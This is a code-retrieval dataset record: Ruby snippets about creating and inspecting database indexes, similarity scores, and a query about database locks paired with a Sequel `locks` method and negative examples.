"def create_i18n_indexes(table_name)\n i18n_indexes.each do |index|\n unless indexes(table_name).map(&:columns).flatten.include? index.to_s\n add_index table_name, index\n end\n end\n end",
"def indexes(table, opts=OPTS)\n return super unless opts.empty?\n\n quoted_name = literal(table)\n if v = Sequel.synchronize{@indexes[quoted_name]}\n return v\n end\n\n result = super\n Sequel.synchronize{@indexes[quoted_name] = result}\n result\n end",
"def get_index_info(klass)\n index_info = []\n indexes = klass.connection.indexes(klass.table_name)\n indexes.each do |index|\n index_info << { :name => index.name, :columns => index.columns.join(\", \"), :unique => (index.unique ? \"UNIQUE\" : \"NO\") }\n end\n index_info\n end",
"def indexes_on(partitioned_table)\n return [] if Gem::Version.new(Rails.version) >= Gem::Version.new('6.0.3')\n return [] unless connection.supports_indexes_on_partitioned_tables?\n\n Indexes.new(connection).on(partitioned_table)\n end",
"def indexes\n @model.indexes.select{|index| index.columns.include? self.name}\n end",
"def index_definition_sql(table_name, index)\n\t raise Error, \"Partial indexes are not supported for this database\" if index[:where]\n\n\t # Basic index creation DDL.\n\t sql = [\"CREATE\"]\n\t case index[:type]\n\t when :bitmap\n\t\t raise Error, \"Bitmap indexes cannot be unique\" if index[:unique]\n\t sql << 'BITMAP'\n\t when NilClass, :normal\n\t sql << 'UNIQUE' if index[:unique]\n\t else\n\t raise Error, \"Index type #{index[:type].inspect} is not supported for this database\"\n\t end\n\t index_name = index[:name] || default_index_name(table_name, index[:columns])\n\t qualified_table_name = quote_schema_table table_name\n\t sql << \"INDEX #{quote_identifier(index_name)} ON #{qualified_table_name}\"\n\t \n\t # Index columns and join indexes.\n index_join, index_columns = *index.values_at(:join,:columns)\n\t sql << literal(index_columns)\n if index_join\n\t\t raise Error, \"Join clauses are only supported for bitmap indexes\" if index[:type]!=:bitmap\n\t\t sql << \"FROM #{qualified_table_name},\"\n\t\t sql << index_columns.map{|k| quote_identifier schema_and_table(k).first }.uniq.join(', ')\n\t\t \n\t\t # TODO: Document this short-hand syntax: {:columns=>[:ref_table__ref_column], :join=>[:fk_column]}\n if Array===index_join and index_join.length==index_columns.length and index_join.all?{|k| Symbol===k}\n index_join = Hash[ index_join.map{|k| :\"#{table_name}__#{k}\" }.zip(index_columns) ]\n end\n\n\t sql << \"WHERE #{filter_expr(index_join)}\"\n\t end\n\t \n\t # Index attributes and options.\n\t sql << 'LOCAL' if index[:partitioned]\n\t sql << flag_option_sql(index, :parallel)\n\t sql << flag_option_sql(index, :logging)\n\t sql << \"TABLESPACE #{quote_identifier(index[:tablespace])}\" if index[:tablespace]\n\t sql << flag_option_sql(index, :visible, 'INVISIBLE')\n\t sql << compress_option_sql(index)\n\t sql << index[:options] if String === index[:options]\n\t sql << 'UNUSABLE' if FalseClass === index[:valid]\n\t sql.compact.join ' '\n\t end",
"def create_hypothetical_indexes(queries, tables)\n candidates = {}\n\n # get initial costs for queries\n calculate_plan(queries)\n explainable_queries = queries.select {|q| q.explainable? && q.high_cost?}\n\n # filter tables for performance\n tables = Set.new(explainable_queries.flat_map(&:tables))\n tables_from_views = Set.new(explainable_queries.flat_map(&:tables_from_views))\n\n if tables.any?\n # since every set of multi-column indexes are expensive\n # try to parse out columns\n possible_columns = Set.new\n explainable_queries.each do |query|\n log \"Finding columns: #{query.statement}\" if @log_level == \"debug3\"\n find_columns(query.tree).each do |col|\n last_col = col[\"fields\"].last\n if last_col[\"String\"]\n possible_columns << last_col[\"String\"][\"str\"]\n end\n end\n end\n\n # create hypothetical indexes\n # use all columns in tables from views\n columns_by_table = columns(tables).select {|c| possible_columns.include?(c[:column]) || tables_from_views.include?(c[:table])}.group_by {|c| c[:table]}\n\n # create single column indexes\n create_hypothetical_indexes_helper(columns_by_table, 1, candidates)\n\n # get next round of costs\n calculate_plan(explainable_queries)\n\n # create multicolumn indexes\n create_hypothetical_indexes_helper(columns_by_table, 2, candidates)\n\n # get next round of costs\n calculate_plan(explainable_queries)\n end\n\n candidates\n end",
"def to_create_index_sql\n queries = []\n unless indexes.blank?\n indexes.each do |column|\n sql = \"CREATE INDEX #{to_s.downcase}_#{column}_index ON \"\n sql << \"#{to_sql} (#{column.to_sql})\"\n queries << sql.compress_lines\n end\n end\n queries\n end",
"def find_indexes(plan)\n find_by_key(plan, \"Index Name\")\n end",
"def index_list_sql_list(table_name, indexes)\n indexes.map{|i| index_definition_sql(table_name, i)}\n end",
"def test_indexes\n idx_name = \"accounts_idx\"\n\n indexes = @connection.indexes(\"accounts\")\n assert_empty indexes\n\n @connection.add_index :accounts, :firm_id, name: idx_name\n indexes = @connection.indexes(\"accounts\")\n assert_equal \"accounts\", indexes.first.table\n assert_equal idx_name, indexes.first.name\n assert !indexes.first.unique\n assert_equal [\"firm_id\"], indexes.first.columns\n ensure\n @connection.remove_index(:accounts, name: idx_name) rescue nil\n end",
"def test_indexes\n idx_name = \"accounts_idx\"\n\n indexes = @connection.indexes(\"accounts\")\n assert_empty indexes\n\n @connection.add_index :accounts, :firm_id, name: idx_name\n indexes = @connection.indexes(\"accounts\")\n assert_equal \"accounts\", indexes.first.table\n assert_equal idx_name, indexes.first.name\n assert !indexes.first.unique\n assert_equal [\"firm_id\"], indexes.first.columns\n ensure\n @connection.remove_index(:accounts, name: idx_name) rescue nil\n end",
"def indexes\r\n if !@indexes\r\n require \"#{File.dirname(__FILE__)}/drivers/#{@opts[:type]}/knjdb_#{@opts[:type]}_indexes\" if (!@opts.key?(:require) or @opts[:require])\r\n @indexes = Kernel.const_get(\"KnjDB_#{@opts[:type]}\".to_sym).const_get(:Indexes).new(\r\n :db => self\r\n )\r\n end\r\n \r\n return @indexes\r\n end",
"def create_table_indexes_from_generator(name, generator, options)\n e = options[:ignore_index_errors] || options[:if_not_exists]\n generator.indexes.each do |index|\n begin\n pr = proc{index_sql_list(name, [index]).each{|sql| execute_ddl(sql)}}\n supports_transactional_ddl? ? transaction(:savepoint=>:only, &pr) : pr.call\n rescue Error\n raise unless e\n end\n end\n end",
"def indexed_facets(model_name)\n tables.grep(/_#{model_name}_(\\w+)_index/) { $1 }\n end",
"def index_by_name(table_name, index_name)\n index_record = data_dictionary.index_by_name(table_name, index_name)\n\n index_space = space(index_record[\"SPACE\"])\n describer = data_dictionary.record_describer_by_index_name(table_name, index_name)\n index_space.index(index_record[\"PAGE_NO\"], describer)\n end",
"def check_indexes(table)\n indexes = table_indexes(table)\n\n indexes.permutation(2).each_with_object([]) do |(source_index, target_index), response|\n next unless source_index.columns.start_with?(target_index.columns)\n\n if target_index.unique\n response << {\n index: source_index,\n result: \"#{source_index.name} has column(s) on the right side of unique index (#{target_index.name}). You can drop if low cardinality\",\n }\n else\n response << {\n index: target_index,\n result: \"#{target_index.name} is a left-prefix of #{source_index.name}\",\n }\n end\n end\n end",
"def index_list_sql_list(table_name, indexes)\n indexes.map{|i| index_definition_sql(table_name, i)}\n end",
"def index_list_sql_list(table_name, indexes)\n indexes.map{|i| index_definition_sql(table_name, i)}\n end",
"def supports_indexes_on_partitioned_tables?\n postgresql_version >= 110_000\n end",
"def create_indexes(table)\n return if !@index\n if !@dry_run\n begin\n connection.query(\"ALTER IGNORE TABLE #{table} ADD PRIMARY KEY (dtime, id)\")\n verbose \" Created primary key index.\"\n rescue\n nil # If we couldn't create the index (because it exists), that's OK.\n end\n end\n end",
"def index_information\n @db.index_information(@name)\n end",
"def install_missing_indexes\n db_connection.execute(\n <<-SQL\n SELECT install_missing_indexes();\n SQL\n )\n end",
"def indexusage\n sql = %q(SELECT\n relname,\n 100 * idx_scan / (seq_scan + idx_scan) percent_of_times_index_used,\n n_live_tup rows_in_table\n FROM\n pg_stat_user_tables\n ORDER BY\n n_live_tup DESC;)\n exec_sql(sql, find_uri)\n end",
"def indexes(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n {}\n end",
"def setup_db_index\n self.copy_tables.each do |t|\n no_sql_connection.create_pre_mongified_id_index(t.name)\n end\n end",
"def all_indexes\n Chewy.eager_load!\n Chewy::Index.descendants - [Chewy::Stash::Journal, Chewy::Stash::Specification]\n end",
"def generate_index tab_name, argv\n\t\tquery = \" CREATE INDEX #{argv[argv.keys[0]]} ON #{tab_name} (#{argv[argv.keys[1]]}) \"\n\t\tputs query\n\t\treturn query\n\tend",
"def index_information\n @db.index_information(@name)\n end",
"def dump_partition_indexes(partitioned_table, stream)\n return unless Tablature.database.respond_to?(:indexes_on)\n\n indexes = Tablature.database.indexes_on(partitioned_table.name)\n return if indexes.empty?\n\n add_index_statements = indexes.map do |index|\n table_name = remove_prefix_and_suffix(index.table).inspect\n \" add_index #{([table_name] + index_parts(index)).join(', ')}\"\n end\n\n stream.puts add_index_statements.sort.join(\"\\n\")\n stream.puts\n end",
"def dump_table_indexes(table, meth, options={})\n return '' unless respond_to?(:indexes)\n im = method(:index_to_generator_opts)\n indexes = indexes(table).sort_by{|k,v| k.to_s} \n gen = Schema::Generator.new(self) do\n indexes.each{|iname, iopts| send(:index, iopts[:columns], im.call(table, iname, iopts))}\n end\n gen.dump_indexes(meth=>table, :ignore_errors=>!options[:same_db])\n end",
"def _indexes_ds\n @_indexes_ds ||= begin\n if server_version >= 90500\n order = [Sequel[:indc][:relname], Sequel.function(:array_position, Sequel[:ind][:indkey], Sequel[:att][:attnum])]\n # :nocov:\n else\n range = 0...32\n order = [Sequel[:indc][:relname], SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(Sequel[:ind][:indkey], [x]), x]}, 32, Sequel[:att][:attnum])]\n # :nocov:\n end\n\n attnums = SQL::Function.new(:ANY, Sequel[:ind][:indkey])\n\n ds = metadata_dataset.\n from{pg_class.as(:tab)}.\n join(Sequel[:pg_index].as(:ind), :indrelid=>:oid).\n join(Sequel[:pg_class].as(:indc), :oid=>:indexrelid).\n join(Sequel[:pg_attribute].as(:att), :attrelid=>Sequel[:tab][:oid], :attnum=>attnums).\n left_join(Sequel[:pg_constraint].as(:con), :conname=>Sequel[:indc][:relname]).\n where{{\n indc[:relkind]=>%w'i I',\n ind[:indisprimary]=>false,\n :indexprs=>nil,\n :indisvalid=>true}}.\n order(*order).\n select{[indc[:relname].as(:name), ind[:indisunique].as(:unique), att[:attname].as(:column), con[:condeferrable].as(:deferrable)]}\n\n # :nocov:\n ds = ds.where(:indisready=>true) if server_version >= 80300\n ds = ds.where(:indislive=>true) if server_version >= 90300\n # :nocov:\n\n ds\n end\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n if index[:type]\n raise Error, \"Index types are not supported for this database\"\n elsif index[:where]\n raise Error, \"Partial indexes are not supported for this database\"\n else\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{index_name} ON #{quote_identifier(table_name)} #{literal(index[:columns])}\"\n end\n end",
"def index_exists_by_name?(table, index)\n indexes_for_table[table].include?(index)\n end",
"def indexes\n @indexes ||= []\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n if index[:type]\n raise Error, \"Index types are not supported for this database\"\n elsif index[:where]\n raise Error, \"Partial indexes are not supported for this database\"\n else\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{quote_identifier(index_name)} ON #{quote_identifier(table_name)} #{literal(index[:columns])}\"\n end\n end",
"def indexes(query)\n indexes = query.model.sphinx_indexes(name) if query.model.respond_to?(:sphinx_indexes)\n if indexes.nil? or indexes.empty?\n indexes = [Index.new(query.model, query.model.storage_name(name))]\n end\n indexes\n end",
"def ensureIndex(table,keys,options={})\n connection.ensureIndex(path(table),keys,options)\n end",
"def to_create_composite_index_sql\n queries = []\n unless composite_indexes.blank?\n composite_indexes.each do |columns, unique|\n sql = \"CREATE #{unique ? 'UNIQUE ' : ''}INDEX \"\n sql << \"#{to_s.downcase}_#{columns.join('_')}_index ON \"\n sql << \"#{to_sql} (#{columns.join(', ')})\"\n queries << sql.compress_lines\n end\n end\n queries\n end",
"def default_index_name(table_name, columns)\n\t\t schema, table = schema_and_table(table_name)\n\t\t ds = DB[:all_indexes].where(:table_name=>table,:dropped=>'NO')\n\t\t ds = ds.where :owner=>schema unless schema.nil?\n\t\t \"#{table[0,25]}_ix%2.2d\" % [ds.count + 1]\n\t\t end",
"def indexes\n Indexes.new(database, name)\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n if index[:type]\n raise Error, \"Index types are not supported for this database\"\n elsif index[:where]\n raise Error, \"Partial indexes are not supported for this database\"\n else\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{quote_identifier(index_name)} ON #{quote_identifier(table_name)} #{literal(index[:columns])}\"\n end\n end",
"def create_indexes_for_all_models\n required_types.values.each do |required_type_class_object|\n required_type_class_object.send(:create_indexes)\n end\n end",
"def add_indexes\n if hereditary? && !index_options[{ _type: 1 }]\n index({ _type: 1 }, { unique: false, background: true })\n end\n true\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n raise Error, \"Index types are not supported for this database\" if index[:type]\n raise Error, \"Partial indexes are not supported for this database\" if index[:where] && !supports_partial_indexes?\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{quote_identifier(index_name)} ON #{quote_schema_table(table_name)} #{literal(index[:columns])}#{\" WHERE #{filter_expr(index[:where])}\" if index[:where]}\"\n end",
"def determine_indexes(queries, candidates, tables)\n new_indexes = {}\n index_name_to_columns = candidates.invert\n\n # filter out existing indexes\n # this must happen at end of process\n # since sometimes hypothetical indexes\n # can give lower cost than actual indexes\n index_set = Set.new\n if tables.any?\n indexes(tables).each do |index|\n if index[\"using\"] == \"btree\"\n # don't add indexes that are already covered\n index_set << [index[\"table\"], index[\"columns\"].first(1)]\n index_set << [index[\"table\"], index[\"columns\"].first(2)]\n end\n end\n end\n\n savings_ratio = (1 - @min_cost_savings_pct / 100.0)\n\n queries.each do |query|\n if query.explainable? && query.high_cost?\n new_cost, new_cost2 = query.costs[1..2]\n\n cost_savings = new_cost < query.initial_cost * savings_ratio\n\n # set high bar for multicolumn indexes\n cost_savings2 = new_cost > 100 && new_cost2 < new_cost * savings_ratio\n\n key = cost_savings2 ? 2 : 1\n query_indexes = hypo_indexes_from_plan(index_name_to_columns, query.plans[key], index_set)\n\n # likely a bad suggestion, so try single column\n if cost_savings2 && query_indexes.size > 1\n query_indexes = hypo_indexes_from_plan(index_name_to_columns, query.plans[1], index_set)\n cost_savings2 = false\n end\n\n suggest_index = cost_savings || cost_savings2\n\n cost_savings3 = false\n new_cost3 = nil\n\n # if multiple indexes are found (for either single or multicolumn)\n # determine the impact of each individually\n # there may be a better single index that we're not considering\n # that didn't get picked up by pass1 or pass2\n # TODO clean this up\n # TODO suggest more than one index from this if savings are there\n if suggest_index && query_indexes.size > 1\n winning_index = nil\n winning_cost = nil\n winning_plan = nil\n\n query_indexes.each do |query_index|\n reset_hypothetical_indexes\n create_hypothetical_index(query_index[:table], query_index[:columns].map {|v| {column: v}})\n plan3 = plan(query.statement)\n cost3 = plan3[\"Total Cost\"]\n\n if !winning_cost || cost3 < winning_cost\n winning_cost = cost3\n winning_index = query_index\n winning_plan = plan3\n end\n end\n\n query.plans << winning_plan\n\n # duplicated from above\n # TODO DRY\n use_winning =\n if cost_savings2\n new_cost > 100 && winning_cost < new_cost * savings_ratio\n else\n winning_cost < query.initial_cost * savings_ratio\n end\n\n if use_winning\n query_indexes = [winning_index]\n cost_savings3 = true\n new_cost3 = winning_cost\n query.pass3_indexes = query_indexes\n else\n suggest_index = false\n end\n end\n\n if suggest_index\n query_indexes.each do |index|\n new_indexes[index] ||= index.dup\n (new_indexes[index][:queries] ||= []) << query\n end\n end\n\n query.indexes = query_indexes\n query.suggest_index = suggest_index\n query.new_cost =\n if suggest_index\n cost_savings3 ? new_cost3 : (cost_savings2 ? 
new_cost2 : new_cost)\n else\n query.initial_cost\n end\n\n # TODO optimize\n if @log_level.start_with?(\"debug\")\n query.pass1_indexes = hypo_indexes_from_plan(index_name_to_columns, query.plans[1], index_set)\n query.pass2_indexes = hypo_indexes_from_plan(index_name_to_columns, query.plans[2], index_set)\n end\n end\n end\n\n # filter out covered indexes\n covered = Set.new\n new_indexes.values.each do |index|\n if index[:columns].size > 1\n covered << [index[:table], index[:columns].first(1)]\n end\n end\n\n ###\n #\n # Project modifications start\n #\n ###\n\n # init set of indexes\n new_indexes_2 = Set.new\n\n # change working directory to specified path with zaman py\n Dir.chdir('/home/vagrant/dexter/lib/dexter') do\n # create array to store queries from log file\n queries_array = Array.new\n\n # iterate through Query object array\n for query in queries\n\n # extract queries (and remove \\t \\n and multiple white space)\n clean_string = (query.statement).gsub(/\\n/, \" \")\n clean_string = clean_string.gsub(/\\t/, \" \")\n fix_string = clean_string.squeeze\n\n # store in queries array\n queries_array.push(fix_string)\n end\n\n # open json file to pass data to zaman.py\n File.open(\"queries.json\", \"w\") do |f|\n # write queries to json file\n f.write(queries_array.to_json)\n end\n\n # create array to store tables names\n table_names = Array.new\n\n # loop through tables set and put name in array\n tables.each do |n|\n table_names.push(n)\n end\n\n # write table names to file\n File.open(\"tables.json\", \"w\") do |f|\n # write tables to json file\n f.write(table_names.to_json)\n end\n\n puts('Data written to json')\n\n # shell out / call zaman python script through sys commands\n # using back ticks ``\n puts('Shelling out to zaman.py')\n\n # error handling for zaman py response\n begin\n zamans_indexes = `python zaman.py queries`\n puts('zaman.py has executed')\n\n # parse json output to set\n zamans_indexes = JSON.parse(zamans_indexes)\n\n # assign suggested indexes from zaman.py to new_indexes_2 set\n new_indexes_2 = zamans_indexes\n puts('suggested indexes received')\n\n rescue\n puts('Error executing zaman.py')\n end\n end\n\n # TODO: cost estimation\n # since the main focus of this project is over Zaman's algorithm, new_indexes_2 takes preference.\n # computes intersection of both new_indexes sets\n if new_indexes.empty?\n new_indexes = new_indexes_2\n elsif new_indexes_2.empty?\n new_indexes = new_indexes\n else\n # set intersection between zamans suggested indices and dexters suggested indices\n new_indexes = new_indexes & new_indexes_2\n end\n\n ###\n #\n # Project modifications end here\n #\n ###\n\n\n # filter out covered indexes\n covered = Set.new\n new_indexes.values.each do |index|\n if index[:columns].size > 1\n covered << [index[:table], index[:columns].first(1)]\n end\n end\n\n new_indexes.values.reject {|i| covered.include?([i[:table], i[:columns]])}.sort_by(&:to_a)\n\n end",
"def dump_table_indexes(table, meth, options=OPTS)\n if supports_index_parsing?\n indexes = indexes(table).sort\n else\n return ''\n end\n\n im = method(:index_to_generator_opts)\n gen = create_table_generator do\n indexes.each{|iname, iopts| send(:index, iopts[:columns], im.call(table, iname, iopts, options))}\n end\n gen.dump_indexes(meth=>table, :ignore_errors=>!options[:same_db])\n end",
"def create_index(table_name, index_spec)\n @iadmin ||= IndexedTableAdmin.new(@configuration)\n @iadmin.addIndex(table_name.to_java_bytes, index_spec)\nend",
"def clustered_index_by_table_name(table_name)\n data_dictionary.clustered_index_name_by_table_name(table_name)\n end",
"def index\n @schema_tables = SchemaTable.all\n end",
"def indexed_database_names\n index_specifications.map do |spec|\n spec.options[:database] || database_name\n end.uniq\n end",
"def suggested_indexes_by_query(queries: nil, query_stats: nil, indexes: nil)\n best_indexes = {}\n\n if suggested_indexes_enabled?\n # get most time-consuming queries\n queries ||= (query_stats || self.query_stats(historical: true, start_at: 24.hours.ago)).map { |qs| qs[:query] }\n\n # get best indexes for queries\n best_indexes = best_index_helper(queries)\n\n if best_indexes.any?\n existing_columns = Hash.new { |hash, key| hash[key] = Hash.new { |hash2, key2| hash2[key2] = [] } }\n indexes ||= self.indexes\n indexes.group_by { |g| g[:using] }.each do |group, inds|\n inds.each do |i|\n existing_columns[group][i[:table]] << i[:columns]\n end\n end\n indexes_by_table = indexes.group_by { |i| i[:table] }\n\n best_indexes.each do |_query, best_index|\n if best_index[:found]\n index = best_index[:index]\n best_index[:table_indexes] = indexes_by_table[index[:table]].to_a\n\n # indexes of same type\n indexes = existing_columns[index[:using] || \"btree\"][index[:table]]\n\n if best_index[:structure][:sort].empty?\n # gist indexes without an opclass\n # (opclass is part of column name, so columns won't match if opclass present)\n indexes += existing_columns[\"gist\"][index[:table]]\n\n # hash indexes work for equality\n indexes += existing_columns[\"hash\"][index[:table]] if best_index[:structure][:where].all? { |v| v[:op] == \"=\" }\n\n # brin indexes work for all\n indexes += existing_columns[\"brin\"][index[:table]]\n end\n\n covering_index = indexes.find { |e| index_covers?(e.map { |v| v.sub(/ inet_ops\\z/, \"\") }, index[:columns]) }\n if covering_index\n best_index[:covering_index] = covering_index\n best_index[:explanation] = \"Covered by index on (#{covering_index.join(\", \")})\"\n end\n end\n end\n end\n else\n raise NotEnabled, \"Suggested indexes not enabled\"\n end\n\n best_indexes\n end",
"def ps_column_indexes\n @ps_column_indexes ||= {\n :user => 0,\n :pid => 1,\n :cpu => 2,\n :memory => 3,\n :vsz => 4,\n :rss => 5,\n :tty => 6,\n :status => 7,\n :started => 8,\n :cpu_time => 9,\n :command => 10\n }\n end",
"def chrono_create_history_indexes_for(table, p_pkey)\n add_temporal_indexes table, :validity, on_current_schema: true\n\n execute \"CREATE INDEX #{table}_inherit_pkey ON #{table} ( #{p_pkey} )\"\n execute \"CREATE INDEX #{table}_recorded_at ON #{table} ( recorded_at )\"\n execute \"CREATE INDEX #{table}_instance_history ON #{table} ( #{p_pkey}, recorded_at )\"\n end",
"def indexed?(table, column); end",
"def temporal_index_names(table, range, options = {})\n prefix = options[:name].presence || \"index_#{table}_temporal\"\n\n # When creating computed indexes\n #\n # e.g. ends_on::timestamp + time '23:59:59'\n #\n # remove everything following the field name.\n range = range.to_s.sub(/\\W.*/, '')\n\n [range, \"lower_#{range}\", \"upper_#{range}\"].map do |suffix|\n [prefix, 'on', suffix].join('_')\n end\n end",
"def on(name)\n indexes_on(name).map.(&method(:index_from_database))\n end",
"def suggested_indexes_by_query(options = {})\n best_indexes = {}\n\n if suggested_indexes_enabled?\n # get most time-consuming queries\n queries = options[:queries] || (options[:query_stats] || self.query_stats(historical: true, start_at: 24.hours.ago)).map { |qs| qs[\"query\"] }\n\n # get best indexes for queries\n best_indexes = best_index_helper(queries)\n\n if best_indexes.any?\n existing_columns = Hash.new { |hash, key| hash[key] = Hash.new { |hash2, key2| hash2[key2] = [] } }\n indexes = self.indexes\n indexes.group_by { |g| g[\"using\"] }.each do |group, inds|\n inds.each do |i|\n existing_columns[group][i[\"table\"]] << i[\"columns\"]\n end\n end\n indexes_by_table = indexes.group_by { |i| i[\"table\"] }\n\n best_indexes.each do |query, best_index|\n if best_index[:found]\n index = best_index[:index]\n best_index[:table_indexes] = indexes_by_table[index[:table]].to_a\n covering_index = existing_columns[index[:using] || \"btree\"][index[:table]].find { |e| index_covers?(e, index[:columns]) }\n if covering_index\n best_index[:covering_index] = covering_index\n best_index[:explanation] = \"Covered by index on (#{covering_index.join(\", \")})\"\n end\n end\n end\n end\n end\n\n best_indexes\n end",
"def list_indexes(opts = {})\n @transporter.read(:GET, '/1/indexes', {}, opts)\n end",
"def generate_text_sql\n ThinkingSphinx.context.indexed_models.each do |model|\n model = model.constantize\n model.define_indexes\n model.sphinx_indexes.each do |idx|\n idx.sources.each do |src|\n puts \"#{model.to_s} SQL => \"\n puts src.to_sql\n end\n end\n end\nend"
] |
[
"0.78263485",
"0.7813025",
"0.7794974",
"0.7794034",
"0.7673546",
"0.76150733",
"0.7565812",
"0.75639427",
"0.7554696",
"0.7554696",
"0.7390897",
"0.7339004",
"0.7273254",
"0.7258199",
"0.72453284",
"0.71867275",
"0.7170862",
"0.714218",
"0.704027",
"0.7033335",
"0.7005751",
"0.7005751",
"0.69842374",
"0.6978574",
"0.6968301",
"0.6968301",
"0.6883104",
"0.68520033",
"0.66517705",
"0.65366167",
"0.6530908",
"0.65159994",
"0.6463609",
"0.64543235",
"0.6451653",
"0.64337987",
"0.64268583",
"0.64266723",
"0.6397183",
"0.6369389",
"0.63687533",
"0.6361503",
"0.6353341",
"0.6343471",
"0.63281244",
"0.63246983",
"0.6303576",
"0.6300279",
"0.6276823",
"0.6256654",
"0.6253182",
"0.6253182",
"0.6246349",
"0.62266564",
"0.6223253",
"0.62104416",
"0.62047243",
"0.6197637",
"0.6197637",
"0.61776197",
"0.61593485",
"0.61502385",
"0.613367",
"0.61102825",
"0.60930526",
"0.6056749",
"0.60485816",
"0.60290897",
"0.6021389",
"0.60133004",
"0.60038346",
"0.5999396",
"0.59814924",
"0.59734553",
"0.59699345",
"0.5956542",
"0.59398484",
"0.59392655",
"0.59372956",
"0.5935423",
"0.59261775",
"0.5891529",
"0.5861507",
"0.5826783",
"0.5799694",
"0.57987034",
"0.57981646",
"0.5793438",
"0.5772128",
"0.57716805",
"0.57671636",
"0.5760072",
"0.5750487",
"0.572752",
"0.57091975",
"0.57014084",
"0.56873924",
"0.56831276",
"0.5673508",
"0.566552"
] |
0.6592221
|
29
|
Dataset containing all current database locks
|
def locks
dataset.from(:pg_class).join(:pg_locks, :relation=>:relfilenode).select{[pg_class[:relname], Sequel::SQL::ColumnAll.new(:pg_locks)]}
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def locks\n sql = %q(\n select\n pg_stat_activity.procpid,\n pg_class.relname,\n pg_locks.transactionid,\n pg_locks.granted,\n substr(pg_stat_activity.current_query,1,30) as query_snippet,\n age(now(),pg_stat_activity.query_start) as \"age\"\n from pg_stat_activity,pg_locks left\n outer join pg_class on (pg_locks.relation = pg_class.oid)\n where pg_stat_activity.current_query <> '<insufficient privilege>' and\n pg_locks.pid=pg_stat_activity.procpid and pg_locks.mode = 'ExclusiveLock' order by query_start)\n\n exec_sql(sql, find_uri)\n end",
"def index\n @migrations_locks = MigrationsLock.all\n end",
"def for_update\n cached_dataset(:_for_update_ds){lock_style(:update)}\n end",
"def resource_locks\n :all\n end",
"def visit_Arel_Nodes_Lock(o, a = nil)\n # SQL Layer does not support row locks\n end",
"def lock_list\n super\n end",
"def coliding_locks\n coliding_locks_scope = Lock.active.where('dyntask_locks.task_id != ?', task_id)\n coliding_locks_scope = coliding_locks_scope.where(name: name,\n resource_id: resource_id,\n resource_type: resource_type)\n unless self.exclusive?\n coliding_locks_scope = coliding_locks_scope.where(:exclusive => true)\n end\n return coliding_locks_scope\n end",
"def read\n return unless locks\n\n result = locks.find(data_bag_id)\n\n result.to_hash if result\n end",
"def supported_locks\n []\n end",
"def nowait\n cached_dataset(:_nowait_ds) do\n raise(Error, 'This dataset does not support raises errors instead of waiting for locked rows') unless supports_nowait?\n clone(:nowait=>true)\n end\n end",
"def lock_keys\n @lock_keys ||= begin\n [stable_hashcode(lock_name), ENV['WITH_ADVISORY_LOCK_PREFIX']].map do |ea|\n # pg advisory args must be 31 bit ints\n ea.to_i & 0x7fffffff\n end\n end\n end",
"def lock_keys\n @lock_keys ||= begin\n [stable_hashcode(lock_name), ENV['WITH_ADVISORY_LOCK_PREFIX']].map do |ea|\n # pg advisory args must be 31 bit ints\n ea.to_i & 0x7fffffff\n end\n end\n end",
"def lock_keys\n @lock_keys ||= [stable_hashcode(lock_name), ENV['WITH_ADVISORY_LOCK_PREFIX']].map do |ea|\n # pg advisory args must be 31 bit ints\n ea.to_i & 0x7fffffff\n end\n end",
"def sync_data\n\t\tSYNC_TABLES.each do |sync|\n\t\t\tself.sync_table(sync)\n\t\tend\n\tend",
"def data_sets\n update\n library.values\n end",
"def select_statement_lock\n Thread.current[:'Arel::Visitors::SQLServerNG.select_statement_lock']\n end",
"def load_cache\n a = dataset.all\n h = {}\n a.each{|o| h[o.pk.freeze] = o.freeze}\n @all = a.freeze\n @cache = h.freeze\n end",
"def all_rows\n cache.all_rows\n end",
"def unlock_all\n update_all('$set': { locking_name_field => nil, locked_at_field => nil }).modified_count\n end",
"def with_database_exclusive_table_lock(&block)\n case @low_card_model.connection.class.name\n when /postgresql/i then with_database_exclusive_table_lock_postgresql(&block)\n when /mysql/i then with_database_exclusive_table_lock_mysql(&block)\n when /sqlite/i then with_database_exclusive_table_lock_sqlite(&block)\n else\n raise LowCardTables::Errors::LowCardUnsupportedDatabaseError, %{You asked for low-card IDs for one or more hashes specifying rows that didn't exist,\nbut, when we went to create them, we discovered that we don't know how to exclusively\nlock tables in your database. (This is very important so that we don't accidentally\ncreate duplicate rows.)\n\nYour database adapter's class name is '#{@low_card_model.connection.class.name}'; please submit at least\na bug report, or, even better, a patch. :) Adding support is quite easy, as long as you know the\nequivalent of 'LOCK TABLE'(s) in your database.}\n end\n end",
"def locks\n @locks ||= begin\n # Grab all the specs from the lockfile\n locks = {}\n parsed_lockfile = Bundler::LockfileParser.new(IO.read(lockfile_path))\n parsed_lockfile.specs.each do |spec|\n # Never include bundler, it can't be bundled and doesn't put itself in\n # the lockfile correctly anyway\n next if spec.name == \"bundler\"\n # Only the platform-specific locks for now (TODO make it possible to emit all locks)\n next if spec.platform && spec.platform != Gem::Platform::RUBY\n lock = lock_source_metadata(spec)\n lock[:version] = spec.version.to_s\n runtime = spec.dependencies.select { |dep| dep.type == :runtime }\n lock[:dependencies] = Set.new(runtime.map { |dep| dep.name })\n lock[:development_dependencies] = Set.new(spec.dependencies.map { |dep| dep.name })\n lock[:dependencies].delete(\"bundler\")\n lock[:development_dependencies].delete(\"bundler\")\n locks[spec.name] = lock\n end\n\n # Transitivize the deps.\n locks.each do |name, lock|\n # Not all deps were brought over (platform-specific ones) so weed them out\n lock[:dependencies] &= locks.keys\n lock[:development_dependencies] &= locks.keys\n\n lock[:dependencies] = transitive_dependencies(locks, name, :dependencies)\n lock[:development_dependencies] = transitive_dependencies(locks, name, :development_dependencies)\n end\n\n locks\n end\n end",
"def all\n\t\t@data_base.keys.dup || []\n\tend",
